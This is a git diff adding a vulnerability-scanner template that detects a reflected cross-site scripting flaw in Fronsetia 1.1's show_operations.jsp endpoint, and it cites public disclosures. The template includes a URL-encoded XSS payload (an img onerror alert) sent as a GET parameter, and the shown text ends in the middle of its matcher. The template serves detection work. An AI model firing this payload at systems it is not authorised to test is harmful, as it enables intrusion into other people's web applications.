diff --git a/http/vulnerabilities/fronsetiav-xss.yaml b/http/vulnerabilities/fronsetiav-xss.yaml
new file mode 100644
index 00000000000..7a90e1cdfd6
--- /dev/null
+++ b/http/vulnerabilities/fronsetiav-xss.yaml
@@ -0,0 +1,28 @@
+id: fronsetiav-xss
+
+info:
+ name: fronsetiav1.1 - Cross-Site Scripting
+ author: s4e-io
+ severity: high
+ description: |
+ The fronsetiav1.1 application is vulnerable to a Reflected XSS attack through the show_operations.jsp endpoint. An attacker can inject malicious scripts via the WSDL Location input, which is executed in the victim's browser due to improper input sanitization. This allows attackers to execute arbitrary JavaScript, potentially stealing sensitive data or performing phishing attacks..
+ reference:
+ - https://seclists.org/fulldisclosure/2024/Nov/10
+ - https://packetstormsecurity.com/files/182764/fronsetia-1.1-Cross-Site-Scripting.html
+ - https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.html
+ metadata:
+ vendor: fronsetiav1.1
+ product: fronsetiav1.1
+ tags: xss,fronsetiav1,seclists,packetstorm
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "